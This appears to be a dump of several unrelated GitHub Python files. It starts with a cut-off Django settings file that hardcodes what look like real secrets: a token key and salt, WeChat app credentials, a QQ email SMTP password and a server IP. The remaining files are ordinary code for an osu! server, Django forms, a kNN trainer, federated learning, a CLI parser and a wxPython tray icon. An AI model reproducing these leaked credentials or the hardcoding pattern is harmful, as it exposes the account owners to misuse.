配置\nELASTIC_SEARCH_CONFIG = {\n 'host': '47.105.104.233',\n 'port': 9200\n}\n\n# 生成token需要的秘钥\nSECURE_KEY = {\n 'SECRET_KEY': '785CHINASUMMER85ISWONDERFUL89HAHA42',\n 'AUTH_SALT': 'A1FE3FGE4RW5G9'\n}\n\n# 配置不需要认证的后端url\nignore_auth_urls = ['/api/v1/student/info/authorize', '/api/v1/user_info/login/']\n\n# 服务器域名\nDOMAIN = 'http://student_test.lxhelper.com'\n\nMEDIA_URL = '/media/'\n\n# 公众号消息推送模板编号\ntemplate_info = {\n 'match_success': 'YeMDfDi25UrcAWLV4GKT2YV3ihrV6LxZH_EZwVxWAVo',\n 'invite_success': '5QiQJNjdkcOSSPgx5W4A0xEBXTuITRwT62YcdOro_iU',\n 'attend_result_notice': 'px45KahMC3zCEXe78el4-tHBYQtBFrtwvwQY3JW0xw8'\n}\n\n# 微信公众号配置\nWX_CONFIG = {\n 'APP_ID': 'wx622bf44e0bee4f2b',\n 'APP_SECRET': '97d4204adeb370336439e67bab275155'\n}\n\n# Django 邮件服务器配置\n\n# 这一项是固定的\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\n# smtp服务的邮箱服务器 我用的是163\nEMAIL_HOST = 'smtp.qq.com'\n# smtp服务固定的端口是25\nEMAIL_PORT = 25\n# 发送邮件的邮箱\nEMAIL_HOST_USER = '52100141@qq.com'\n# 在邮箱中设置的客户端授权密码\nEMAIL_HOST_PASSWORD = 'kfznegjwtjfhbjbj'\n# 收件人看到的发件人 <此处要和发送邮件的邮箱相同>\nEMAIL_FROM = 'python<52100141@qq.com>'\n","repo_name":"liaochenghao/studentsys","sub_path":"StudentManageSys/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":9309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"865350116","text":"import random\n\nfrom common import generalUtils\nfrom common.log import logUtils as log\nfrom constants import clientPackets\nfrom constants import matchModModes\nfrom constants import matchTeamTypes\nfrom constants import matchTeams\nfrom constants import slotStatuses\nfrom objects import glob\n\n\ndef handle(userToken, packetData):\n\t# Read new settings\n\tpacketData = clientPackets.changeMatchSettings(packetData)\n\n\t# Get match ID\n\tmatchID = userToken.matchID\n\t\t\n\t# Make sure the match exists\n\tif matchID not in glob.matches.matches:\n\t\treturn\n\n\t# Host check\n\twith glob.matches.matches[matchID] as match:\n\t\tif userToken.userID != match.hostUserID:\n\t\t\treturn\n\n\t\t# Some dank memes easter egg\n\t\tmemeTitles = [\n\t\t\t\"RWC 2020\",\n\t\t\t\"Fokabot is a duck\",\n\t\t\t\"Dank memes\",\n\t\t\t\"1337ms Ping\",\n\t\t\t\"Iscriviti a Xenotoze\",\n\t\t\t\"...e i marò?\",\n\t\t\t\"Superman dies\",\n\t\t\t\"The brace is on fire\",\n\t\t\t\"print_foot()\",\n\t\t\t\"#FREEZEBARKEZ\",\n\t\t\t\"Ripple devs are actually cats\",\n\t\t\t\"Thank Mr Shaural\",\n\t\t\t\"NEVER GIVE UP\",\n\t\t\t\"T I E D W I T H U N I T E D\",\n\t\t\t\"HIGHEST HDHR LOBBY OF ALL TIME\",\n\t\t\t\"This is gasoline and I set myself on fire\",\n\t\t\t\"Everyone is cheating apparently\",\n\t\t\t\"Kurwa mac\",\n\t\t\t\"TATOE\",\n\t\t\t\"This is not your drama landfill.\",\n\t\t\t\"I like cheese\",\n\t\t\t\"NYO IS NOT A CAT HE IS A DO(N)G\",\n\t\t\t\"Datingu startuato\"\n\t\t]\n\n\t\t# Set match name\n\t\tmatch.matchName = packetData[\"matchName\"] if packetData[\"matchName\"] != \"meme\" else random.choice(memeTitles)\n\n\t\t# Update match settings\n\t\tmatch.inProgress = packetData[\"inProgress\"]\n\t\tif packetData[\"matchPassword\"] != \"\":\n\t\t\tmatch.matchPassword = generalUtils.stringMd5(packetData[\"matchPassword\"])\n\t\telse:\n\t\t\tmatch.matchPassword = \"\"\n\t\tmatch.beatmapName = packetData[\"beatmapName\"]\n\t\tmatch.beatmapID = packetData[\"beatmapID\"]\n\t\tmatch.hostUserID = packetData[\"hostUserID\"]\n\t\tmatch.gameMode = packetData[\"gameMode\"]\n\n\t\toldBeatmapMD5 = match.beatmapMD5\n\t\toldMods = match.mods\n\t\toldMatchTeamType = match.matchTeamType\n\n\t\tmatch.mods = packetData[\"mods\"]\n\t\tmatch.beatmapMD5 = packetData[\"beatmapMD5\"]\n\t\tmatch.matchScoringType = packetData[\"scoringType\"]\n\t\tmatch.matchTeamType = packetData[\"teamType\"]\n\t\tmatch.matchModMode = packetData[\"freeMods\"]\n\n\t\t# Reset ready if needed\n\t\tif oldMods != match.mods or oldBeatmapMD5 != match.beatmapMD5:\n\t\t\tmatch.resetReady()\n\n\t\t# Reset mods if needed\n\t\tif match.matchModMode == matchModModes.NORMAL:\n\t\t\t# Reset slot mods if not freeMods\n\t\t\tmatch.resetMods()\n\t\telse:\n\t\t\t# Reset match mods if freemod\n\t\t\tmatch.mods = 0\n\n\t\t# Initialize teams if team type changed\n\t\tif match.matchTeamType != oldMatchTeamType:\n\t\t\tmatch.initializeTeams()\n\n\t\t# Force no freemods if tag coop\n\t\tif match.matchTeamType == matchTeamTypes.TAG_COOP or match.matchTeamType == matchTeamTypes.TAG_TEAM_VS:\n\t\t\tmatch.matchModMode = matchModModes.NORMAL\n\n\t\t# Send updated settings\n\t\tmatch.sendUpdates()\n\n\t\t# Console output\n\t\tlog.info(\"MPROOM{}: Updated room settings\".format(match.matchID))\n","repo_name":"osuripple/pep.py","sub_path":"events/changeMatchSettingsEvent.py","file_name":"changeMatchSettingsEvent.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"74264948006","text":"from django import forms\nfrom django.contrib.auth.models import User\nfrom django.db.models import Avg\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom nolsatu_courses.apps.courses.models import (\n Courses, Batch, CollectTask, )\nfrom nolsatu_courses.backoffice.tasks.forms import FormFilterTask, FormFilterTaskReport\n\n\nclass TrainerFormFilterTask(FormFilterTask):\n\n def __init__(self, *args, **kwargs):\n user_email = kwargs.pop('user_email', None)\n self.tasks = None\n super(TrainerFormFilterTask, self).__init__(*args, **kwargs)\n self.fields['course'].queryset = Courses.objects.filter(batchs__teaches__user__email=user_email)\n self.fields['batch'].queryset = Batch.objects.filter(teaches__user__email=user_email)\n\n\nclass TrainerFormFilterTaskReport(FormFilterTaskReport):\n batch = forms.ModelChoiceField(\n queryset=Batch.objects.all(), empty_label=_(\"Pilih Angkatan\"))\n\n def get_data(self):\n course = self.cleaned_data['course']\n batch = self.cleaned_data['batch']\n\n users = User.objects\n\n if course:\n users = users.filter(enroll__course=course)\n\n if batch:\n users = users.filter(enroll__batch=batch)\n\n avg_score = CollectTask.objects.filter(\n section__module__course=course\n ).values(\"user\").annotate(avg_score=Avg(\"score\"))\n\n avg_score = {d['user']: d['avg_score'] for d in avg_score}\n\n return users, avg_score, batch\n\n def __init__(self, *args, **kwargs):\n user_email = kwargs.pop('user_email', None)\n self.tasks = None\n super(FormFilterTaskReport, self).__init__(*args, **kwargs)\n self.fields['course'].queryset = Courses.objects.filter(batchs__teaches__user__email=user_email)\n self.fields['batch'].queryset = Batch.objects.filter(teaches__user__email=user_email)\n","repo_name":"nolsatuid/courses","sub_path":"nolsatu_courses/teachersroom/tasks/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34851321275","text":"__author__ = \\\n 'jeffy@google.com (Jeff Posnick) and jjinux@google.com (JJ Behrens)'\n\nfrom playlistpicker.handlers.basehandler import BaseHandler\nfrom playlistpicker.utils import channels as channelutils\nfrom playlistpicker.utils import youtube as youtubeutils\n\n\nclass MovePlaylistEntryHandler(BaseHandler):\n @BaseHandler.oauth2_decorator.oauth_required\n @BaseHandler.authorize_playlist\n @BaseHandler.playlist_entry_uri_required\n def post(self, playlist_id):\n position = int(self.request.get(\"position\"))\n yt_service_for_owner = youtubeutils.create_youtube_service(\n self.owner_oauth_token)\n response = yt_service_for_owner.UpdatePlaylistVideoEntryMetaData(\n self.playlist_uri, self.playlist_entry_id, None, None, position)\n assert response\n youtubeutils.write_playlist(self, yt_service_for_owner, playlist_id,\n channelutils.notify_playlist_listeners)\n\n\n","repo_name":"jjinux/party-playlist-picker","sub_path":"playlistpicker/handlers/moveplaylistentryhandler.py","file_name":"moveplaylistentryhandler.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75328585768","text":"import os\nimport logging\n\nimport joblib\nimport numpy as np\n\nfrom torch.optim import SGD\nfrom torch.utils.data import TensorDataset\n\nfrom scipy.sparse import csr_matrix\nfrom sklearn.neighbors import NearestNeighbors\nfrom annoy import AnnoyIndex\n\nfrom knodle.transformation.majority import input_to_majority_vote_input\nfrom knodle.transformation.torch_input import input_labels_to_tensordataset\n\nfrom knodle.trainer.auto_trainer import AutoTrainer\nfrom knodle.trainer.baseline.majority import MajorityVoteTrainer\nfrom knodle.trainer.knn_aggregation.config import KNNConfig\nfrom knodle.trainer.utils.denoise import activate_neighbors\n\nlogger = logging.getLogger(__name__)\n\n\n@AutoTrainer.register('knn')\nclass KNNAggregationTrainer(MajorityVoteTrainer):\n def __init__(\n self,\n knn_feature_matrix: np.ndarray = None,\n **kwargs\n ):\n if kwargs.get(\"trainer_config\") is None:\n kwargs[\"trainer_config\"] = KNNConfig(optimizer=SGD, lr=0.001)\n super().__init__(**kwargs)\n\n if knn_feature_matrix is None:\n self.knn_feature_matrix = csr_matrix(self.model_input_x.tensors[0].numpy())\n else:\n self.knn_feature_matrix = knn_feature_matrix\n\n def train(\n self,\n model_input_x: TensorDataset = None, rule_matches_z: np.ndarray = None,\n dev_model_input_x: TensorDataset = None, dev_gold_labels_y: TensorDataset = None\n ):\n self._load_train_params(model_input_x, rule_matches_z, dev_model_input_x, dev_gold_labels_y)\n self._apply_rule_reduction()\n\n # initialise optimizer\n self.trainer_config.optimizer = self.initialise_optimizer()\n\n self.rule_matches_z = self.rule_matches_z.astype(np.int8)\n self.mapping_rules_labels_t = self.mapping_rules_labels_t.astype(np.int8)\n\n self._knn_denoise_rule_matches()\n\n self.model_input_x, noisy_input_y, self.rule_matches_z = input_to_majority_vote_input(\n self.rule_matches_z, self.mapping_rules_labels_t.astype(np.int64), self.model_input_x,\n use_probabilistic_labels=self.trainer_config.use_probabilistic_labels,\n filter_non_labelled=self.trainer_config.filter_non_labelled,\n probability_threshold=self.trainer_config.probability_threshold,\n other_class_id=self.trainer_config.other_class_id,\n multi_label=self.trainer_config.multi_label,\n multi_label_threshold=self.trainer_config.multi_label_threshold\n )\n\n feature_label_dataset = input_labels_to_tensordataset(self.model_input_x, noisy_input_y)\n feature_label_dataloader = self._make_dataloader(feature_label_dataset)\n\n self._train_loop(feature_label_dataloader)\n\n def _knn_denoise_rule_matches(self) -> np.ndarray:\n \"\"\"\n Denoises the applied weak supervision source.\n Args:\n rule_matches_z: Matrix with all applied weak supervision sources. Shape: (Instances x Rules)\n Returns: Denoised / Improved applied labeling function matrix. Shape: (Instances x Rules)\n \"\"\"\n k = self.trainer_config.k\n if k == 1:\n return self.rule_matches_z\n\n # load cached data, if available\n if self.trainer_config.caching_folder:\n cache_file = self.trainer_config.get_cache_file()\n if os.path.isfile(cache_file):\n logger.info(f\"Loaded knn matrix from cache: {cache_file}\")\n return joblib.load(cache_file)\n\n logger.info(f\"Start denoising labeling functions with k: {k}.\")\n\n # ignore zero-match rows for knn construction & activation\n if self.trainer_config.activate_no_match_instances:\n ignore = np.zeros((self.knn_feature_matrix.shape[0],), dtype=np.bool)\n else:\n ignore = self.rule_matches_z.sum(-1) == 0\n\n # Set up data structure, to quickly find nearest neighbors\n if self.trainer_config.use_approximation:\n # use annoy fast ANN\n if k is not None:\n knn_matrix_shape = self.knn_feature_matrix.shape\n\n logger.info(\"Creating annoy index...\")\n t = AnnoyIndex(knn_matrix_shape[1], 'dot')\n for i, v in enumerate(self.knn_feature_matrix):\n if not ignore[i]:\n t.add_item(i, v)\n\n t.build(10, n_jobs=self.trainer_config.n_jobs)\n\n self.knn_feature_matrix = None\n\n logger.info(\"Retrieving neighbor indices...\")\n indices = ( # make a generator: no memory is allocated at this moment\n np.array(t.get_nns_by_item(i, k, search_k=-1, include_distances=False))\n if not ignore[i] else np.array([])\n for i in range(knn_matrix_shape[0])\n )\n else:\n # possible radius implementation; delete error in config then\n pass\n else:\n # use standard precise kNN\n if k is not None:\n logger.info(\"Creating NN index...\")\n neighbors = NearestNeighbors(n_neighbors=k, n_jobs=self.trainer_config.n_jobs)\\\n .fit(self.knn_feature_matrix)\n logger.info(\"Retrieving neighbor indices...\")\n indices = neighbors.kneighbors(self.knn_feature_matrix, n_neighbors=k, return_distance=False)\n else:\n logger.info(\"Creating NN index...\")\n neighbors = NearestNeighbors(radius=self.trainer_config.radius, n_jobs=self.trainer_config.n_jobs)\\\n .fit(self.knn_feature_matrix)\n logger.info(\"Retrieving neighbor indices...\")\n indices = neighbors.radius_neighbors(self.knn_feature_matrix, return_distance=False)\n\n # activate matches.\n logger.info(\"Activating neighbors...\")\n self.rule_matches_z = activate_neighbors(self.rule_matches_z, indices)\n\n # save data for caching\n if self.trainer_config.caching_folder:\n os.makedirs(self.trainer_config.caching_folder, exist_ok=True)\n joblib.dump(self.rule_matches_z, cache_file)\n\n return self.rule_matches_z\n\n def print_step_update(self, step: int, max_steps: int):\n if step % 40 == 0 and not step == 0:\n logger.info(f\" Batch {step} of {max_steps}.\")\n","repo_name":"knodle/knodle","sub_path":"knodle/trainer/knn_aggregation/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"53"} +{"seq_id":"32129474365","text":"import json\nimport pandas as pd\ndata_file = open(\"yelp_academic_dataset_checkin.json\")\ndata = []\nfor line in data_file:\n data.append(json.loads(line))\ncheckin_df = pd.DataFrame(data)\ndata_file.close()\nprint(\"Shape is: \" + str(checkin_df.shape))\nprint(checkin_df.head())","repo_name":"maxsicherman/Yelp-Project","sub_path":"Yelp_data.py","file_name":"Yelp_data.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"557600623","text":"from src.trainers.base import BaseTrainer\nfrom src.models.model import choose_model\nfrom src.models.worker import LrdWorker\nfrom src.optimizers.gd import GD\nimport numpy as np\nimport math\nimport torch\n\ncriterion = torch.nn.CrossEntropyLoss()\n\n\nclass FedAvg4Trainer(BaseTrainer):\n \"\"\"\n Scheme I and Scheme II, based on the flag of self.simple_average\n \"\"\"\n\n def __init__(self, options, dataset):\n self.data_num = list()\n\n self.model = choose_model(options)\n self.move_model_to_gpu(self.model, options)\n\n self.optimizer = GD(self.model.parameters(), lr=options['lr'], weight_decay=options['wd'])\n self.num_epoch = options['num_epoch'] # E\n worker = LrdWorker(self.model, self.optimizer, options)\n super(FedAvg4Trainer, self).__init__(options, dataset, worker=worker)\n\n self.selected_times = [0 for i in range(self.clients_num)]\n\n self.prob = self.compute_prob()\n\n # privacy loss related parameters\n self.delta = 1e-5\n self.sigma = 0.9\n self.l_max = 32\n self.epsilon = 0\n self.w_clip = 60\n self.km = [[0 for i in range(self.l_max + 1)] for j in range(self.clients_num)]\n\n def local_train(self, round_i, selected_clients, **kwargs):\n \"\"\"Training procedure for selected local clients\n\n Args:\n round_i: i-th round training\n selected_clients: list of selected clients\n\n Returns:\n solns: local solutions, list of the tuple (num_sample, local_solution)\n stats: Dict of some statistics\n \"\"\"\n solns = [] # Buffer for receiving client solutions\n stats = [] # Buffer for receiving client communication costs\n for i, c in enumerate(selected_clients, start=1):\n # Communicate the latest model\n c.set_flat_model_params(self.latest_model)\n\n # Solve minimization locally\n soln, stat = c.local_train()\n\n # Compute the LDP privacy loss for each client\n pl = self.compute_privacy_loss_advanced(self.selected_times[c.cid], c.cid)\n self.epsilon = max(self.epsilon, pl)\n if self.print_result:\n print(\"Round: {:>2d} | CID: {: >3d} ({:>2d}/{:>2d})| \"\n \"Privacy Loss: {:>.5f} | \"\n \"Param: norm {:>.4f} ({:>.4f}->{:>.4f})| \"\n \"Loss {:>.4f} | Acc {:>5.2f}% | Time: {:>.2f}s\".format(\n round_i, c.cid, i, self.clients_per_round,\n pl, # the accumulated privacy loss for the client\n stat['norm'], stat['min'], stat['max'],\n stat['loss'], stat['acc'] * 100, stat['time']))\n\n # Add solutions and stats\n solns.append(soln)\n stats.append(stat)\n\n return solns, stats\n\n def train(self):\n print('>>> Select {} clients per round \\n'.format(self.clients_per_round))\n\n # Fetch latest flat model parameter\n self.latest_model = self.worker.get_flat_model_params().detach()\n\n # initialization for pl\n self.init_coefficient()\n\n for round_i in range(self.num_round):\n # Test latest model on train data\n self.test_latest_model_on_traindata(round_i)\n self.test_latest_model_on_evaldata(round_i)\n\n # Choose K clients prop to data size\n selected_clients, repeated_times = self.select_clients_with_prob(seed=round_i)\n\n # Solve minimization locally\n solns, stats = self.local_train(round_i, selected_clients)\n print(self.epsilon)\n\n # Track communication cost\n self.metrics.extend_commu_stats(round_i, stats)\n\n # Update latest model\n self.latest_model = self.aggregate(solns, repeated_times=repeated_times)\n self.optimizer.inverse_prop_decay_learning_rate(round_i)\n\n # Test final model on train data\n self.test_latest_model_on_traindata(self.num_round)\n self.test_latest_model_on_evaldata(self.num_round)\n\n # Save tracked information\n # 存到json文件中,以人类可读的方式\n self.metrics.write()\n\n def compute_prob(self):\n probs = []\n for c in self.clients:\n probs.append(len(c.train_data))\n return np.array(probs) / sum(probs)\n\n def select_clients_with_prob(self, seed=1):\n num_clients = min(self.clients_per_round, len(self.clients))\n np.random.seed(seed)\n index = np.random.choice(len(self.clients), num_clients, p=self.prob)\n index = sorted(index.tolist())\n\n select_clients = []\n select_index = []\n repeated_times = []\n for i in index:\n if i not in select_index:\n select_clients.append(self.clients[i])\n select_index.append(i)\n repeated_times.append(1)\n else:\n repeated_times[-1] += 1\n\n # to compute the accumulated PL\n for i in index:\n self.selected_times[i] += 1\n\n return select_clients, repeated_times\n\n def aggregate(self, solns, **kwargs):\n averaged_solution = torch.zeros_like(self.latest_model)\n # averaged_solution = np.zeros(self.latest_model.shape)\n if self.simple_average:\n repeated_times = kwargs['repeated_times']\n assert len(solns) == len(repeated_times)\n for i, (num_sample, local_solution) in enumerate(solns):\n # repeated_times[i] maybe means one client can be selected multiple times by uniform randomization\n # the noise addition position should be moved into client to be closer to the actual situation\n local_solution = local_solution / max(1, torch.norm(local_solution) / self.w_clip)\n sensitivity=torch.norm(local_solution)\n averaged_solution += (local_solution +\n (self.sigma ** 2) * (sensitivity ** 2) *\n torch.randn(local_solution.shape)) * repeated_times[i]\n averaged_solution /= self.clients_per_round\n else:\n for num_sample, local_solution in solns:\n averaged_solution += num_sample * local_solution\n averaged_solution /= self.all_train_data_num\n averaged_solution *= (100 / self.clients_per_round)\n # print(averaged_solution)\n print(torch.norm(averaged_solution))\n return averaged_solution.detach()\n\n def log_moment_generating_func(self, l, q):\n m = 0\n for k in range(0, l + 1):\n # calculate C(alpha, k)\n comb_num = math.factorial(l) / (math.factorial(k) * math.factorial(l - k))\n # notice: the exp() will easily cause overflow!! so sigma under 1 is dangerous\n m += comb_num * (1 - q) ** (l - k) * q ** k * math.exp((k ** 2 - k) / (2 * self.sigma ** 2))\n return math.log(m)\n\n def init_coefficient(self):\n for i in range(self.clients_num):\n q = self.batch_size / self.data_num[i]\n print(i, q)\n for j in range(1, self.l_max + 1):\n self.km[i][j] = self.log_moment_generating_func(j, q)\n\n def compute_privacy_loss_advanced(self, step, client):\n e = 1e9\n for l in range(1, self.l_max + 1):\n epsilon_with_l = (self.km[client][l] * step + math.log(1 / self.delta)) / l\n # print(l, epsilon_with_l)\n e = min(epsilon_with_l, e)\n return e\n","repo_name":"jasonchen505/AdaDPFedAvg","sub_path":"src/trainers/fedavg4.py","file_name":"fedavg4.py","file_ext":"py","file_size_in_byte":7537,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38979295684","text":"'''a = int(input(\"Enter First Number :\"))\nprint(type(a))\nb = int(input(\"enter second number :\"))\nc = a+b\nprint(c)\n\n'''\n\n#use # for single line comment\n#use ''' for multiline comment\n\na = float(input(\"Enter First Number :\"))\nb = float(input(\"enter second number :\"))\nc = a+b\n#print(\"sum of \",a,\"and\",b,\"is\",c)\n#print(\"sum of {} and {} is {}\".format(a,b,c))\n#print(f\"sum of {a} and {b} is {c}\")-\nprint(\"sum is %f\"%c)\nprint(\"sum of %f and %f = %f\"%(a,b,c))\n\n\n","repo_name":"Sahil4UI/Python_REG_Feb_Afternoon","sub_path":"code-1.py","file_name":"code-1.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20308196672","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCommand line argument parser and handler for the OpenTabulate console script.\n\nCreated and written by Maksym Neyra-Nesterenko, with support and funding from the\n*Center for Special Business Projects* (CSBP) at *Statistics Canada*.\n\"\"\"\nimport os\nimport sys\nimport argparse\nimport logging\nfrom opentabulate.main.config import ConfigError\nfrom opentabulate.main.config import DEFAULT_PATHS as def_paths\nfrom opentabulate.main.config import SUPPORTED_ENCODINGS as supp_enc\nfrom opentabulate.main.config import ENCODING_ERRORS as enc_errs\n\ndef parse_arguments():\n \"\"\"\n Define the command line argument structure and parse it.\n \"\"\"\n cmd_args = argparse.ArgumentParser(\n description='OpenTabulate: a command-line data tabulation tool.',\n usage='%(prog)s [options] [SOURCE [SOURCE ...]]',\n add_help=False\n )\n # positional arguments\n positional_args = cmd_args.add_argument_group('positional arguments')\n positional_args.add_argument('SOURCE', nargs='*', default=None, help='path to source file')\n\n # runtime options\n runtime_args = cmd_args.add_argument_group('runtime arguments')\n runtime_args.add_argument('-h', '--help', action='help',\n help='show this help message and exit')\n runtime_args.add_argument('--initialize', action='store_true', \n help='create processing directories')\n runtime_args.add_argument('-c', '--copy-config', action='store_true',\n help='copy example config file to ~/.config/opentabulate')\n runtime_args.add_argument('-s', '--verify-source', action='store_true', default=False,\n help='validate source files without processing data')\n runtime_args.add_argument('--clear-cache', action='store_true',\n help='clear processing redundancy cache')\n runtime_args.add_argument('--ignore-cache', action='store_true',\n help='ignore processing redundancy cache')\n runtime_args.add_argument('-t', '--threads', action='store', default=1, type=int, metavar='N',\n help='multithread data processing on N threads')\n \n # configuration options\n config_args = cmd_args.add_argument_group('configuration arguments',\n description='override configuration file options')\n config_args.add_argument('--add-index', action='store', default=None, type=str, metavar='BOOL',\n help='insert index column to output')\n config_args.add_argument('--target-enc', action='store', default=None, type=str, metavar='ENCODING',\n help='output character encoding')\n config_args.add_argument('--output-enc-errors', action='store', default=None, type=str, metavar='HANDLER',\n help='error handler for character re-encoding')\n config_args.add_argument('--clean-ws', action='store', default=None, type=str, metavar='BOOL',\n help='clean whitespace in output')\n config_args.add_argument('--lowercase', action='store', default=None, type=str, metavar='BOOL',\n help='convert output to lowercase')\n config_args.add_argument('-l', '--log-level', action='store', default=None, type=int, metavar='N',\n help='specify data processing log verbosity')\n \n return cmd_args.parse_args()\n\n\ndef validate_args_and_config(p_args, config, cache_mgrs):\n \"\"\"\n Validate the configuration file and command line arguments, then perform\n actions based on the read parameters.\n\n Note:\n p_args is modified in this method.\n\n Args:\n p_args (argparse.Namespace): Parsed arguments.\n config (Configuration): OpenTabulate configuration.\n cache_mgrs (list): List of CacheManager objects.\n \"\"\"\n data_folders = ('./data', './data/input', './data/output', './sources')\n \n if p_args.copy_config == True:\n if os.path.exists(def_paths['conf_file']):\n print(\"Configuration file already exists, not doing anything.\", file=sys.stderr)\n sys.exit(1)\n \n conf_example = os.path.join(\n os.path.dirname(__file__),\n '../share/opentabulate.conf.example'\n )\n try:\n assert os.path.exists(conf_example)\n except AssertionError:\n print(\"Cannot find or read example OpenTabulate configuration.\", file=sys.stderr)\n sys.exit(1)\n\n print(\"Copying configuration to %s.\" % def_paths['conf_file'])\n\n # create configuration directory if it doesn't already exist\n os.makedirs(def_paths['conf_dir'], exist_ok=True)\n\n # write example configuration file\n with open(def_paths['conf_file'], 'wb') as outfile, open(conf_example, 'rb') as infile:\n outfile.write(infile.read())\n\n print(\"Done.\")\n sys.exit(0)\n\n # load and validate configuration\n try:\n config.load()\n config.validate()\n except ConfigError as conf_err:\n print(\"Configuration error: %s\" % conf_err, file=sys.stderr)\n sys.exit(1)\n except Exception as err: # other errors (such as loading file)\n print(\"Error: %s\" % err, file=sys.stderr)\n sys.exit(1)\n \n root_dir = config.get('general', 'root_directory')\n\n # check that root directory is an absolute path\n try:\n assert os.path.isabs(os.path.expanduser(root_dir))\n except AssertionError:\n print(\"Configuration error: root directory must be an absolute path\",\n file=sys.stderr)\n sys.exit(1)\n \n if p_args.initialize == True:\n # try to populate root directory with folders (also validate\n # its creation and contents)\n try:\n os.makedirs(root_dir, exist_ok=True)\n except FileExistsError:\n print(root_dir, \"is a file.\", file=sys.stderr)\n sys.exit(1)\n \n os.chdir(root_dir)\n\n if len(os.listdir()) != 0:\n print(\"OpenTabulate data directory is non-empty, cannot initialize.\",\n file=sys.stderr)\n sys.exit(1)\n else:\n print(\"Populating OpenTabulate data directory...\")\n for directory in data_folders:\n os.makedirs(directory)\n print(\"Finished creating directories at: %s\" % os.getcwd())\n sys.exit(0)\n\n # clear cache and exit if --clear-cache flag is set\n if p_args.clear_cache == True:\n print(\"Clearing cache.\")\n for manager in cache_mgrs:\n manager.write_cache() # this writes an empty cache\n sys.exit(0)\n\n # update SOURCE paths to absolute paths *BEFORE* changing current working directory\n for i in range(len(p_args.SOURCE)):\n p_args.SOURCE[i] = os.path.realpath(p_args.SOURCE[i])\n \n # check that OpenTabulate's root directory exists\n try:\n os.chdir(root_dir)\n except (FileNotFoundError, NotADirectoryError):\n print(\"Error: configured OpenTabulate directory does not exist or\"\n \" not a directory.\", file=sys.stderr)\n sys.exit(1)\n\n # verify that the data directories are intact\n for directory in data_folders:\n if not os.path.isdir(directory):\n print(\"Error: data directories are misconfigured.\", file=sys.stderr)\n sys.exit(1)\n\n # now we validate other command-line arguments here\n if p_args.SOURCE == []:\n print(\"Error: no SOURCE argument specified.\", file=sys.stderr)\n sys.exit(1)\n\n if int(p_args.threads) <= 0:\n print(\"Error: number of threads must be > 0.\", file=sys.stderr)\n sys.exit(1)\n \n log_level_map = {0 : logging.DEBUG,\n 1 : logging.INFO,\n 2 : logging.WARNING,\n 3 : logging.ERROR}\n\n # override configuration options if command line flags are used \n if p_args.add_index is not None:\n config['general']['add_index'] = p_args.add_index\n try:\n config.getboolean('general', 'add_index')\n except ValueError:\n print(\"Error: add index flag must be a boolean value.\", file=sys.stderr)\n sys.exit(1)\n \n if p_args.target_enc is not None:\n if p_args.target_enc not in supp_enc:\n print(\"Error: '%s' is not a supported output encoding.\" \n % p_args.target_enc, file=sys.stderr)\n sys.exit(1)\n else:\n config['general']['target_encoding'] = p_args.target_enc\n\n if p_args.output_enc_errors is not None:\n if p_args.output_enc_errors not in enc_errs:\n print(\"Error: '%s' is not an output encoding error handler.\"\n % p_args.output_enc_errors)\n sys.exit(1)\n else:\n config['general']['output_encoding_errors'] = p_args.output_enc_errors\n\n if p_args.clean_ws is not None:\n config['general']['clean_whitespace'] = p_args.clean_ws\n try:\n config.getboolean('general', 'clean_whitespace')\n except ValueError:\n print(\"Error: clean whitespace flag must be a boolean value.\", file=sys.stderr)\n sys.exit(1)\n\n if p_args.lowercase is not None:\n config['general']['lowercase_output'] = p_args.lowercase\n try:\n config.getboolean('general', 'lowercase_output')\n except ValueError:\n print(\"Error: lowercase flag must be a boolean value.\", file=sys.stderr)\n sys.exit(1)\n \n if p_args.log_level is not None:\n if p_args.log_level in log_level_map:\n logging.basicConfig(format='[%(levelname)s] <%(name)s>: %(message)s',\n level=log_level_map[p_args.log_level])\n else:\n print(\"Error: log level must be 0, 1, 2 or 3 (the lower, the more verbose).\", \n file=sys.stderr)\n sys.exit(1)\n else:\n logging.basicConfig(format='[%(levelname)s] <%(name)s>: %(message)s',\n level=log_level_map[config.getint('general', 'log_level')])\n","repo_name":"CSBP-CPSE/OpenTabulate","sub_path":"opentabulate/main/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":10144,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"26256507658","text":"# tray.py: system tray support\n# arch-tag: system tray support\n# author: Alberto Griggio \n# license: GPL\n\nimport wx\nimport common\n\n__all__ = ['show_tray_icon']\n\n_supported = getattr(wx, 'TaskBarIcon', None) is not None\n\nif _supported:\n def show_tray_icon(app):\n tbicon = wx.TaskBarIcon()\n tbicon.SetIcon(common.get_theme_icon())\n\n ID_MINIMIZE = wx.NewId()\n ID_HIDE = wx.NewId()\n ID_QUIT = wx.NewId()\n \n def on_right_down(event):\n menu = wx.Menu('Cornice')\n menu.Append(ID_HIDE, _('Show/Hide'))\n menu.Append(ID_MINIMIZE, _('Minimize/Restore'))\n menu.AppendSeparator()\n menu.Append(ID_QUIT, _('Quit'))\n tbicon.PopupMenu(menu)\n menu.Destroy()\n\n def on_minimize(event):\n if app.main_frame is None:\n app.create_frames()\n \n if app.main_frame.IsShown():\n app.main_frame.Iconize(not 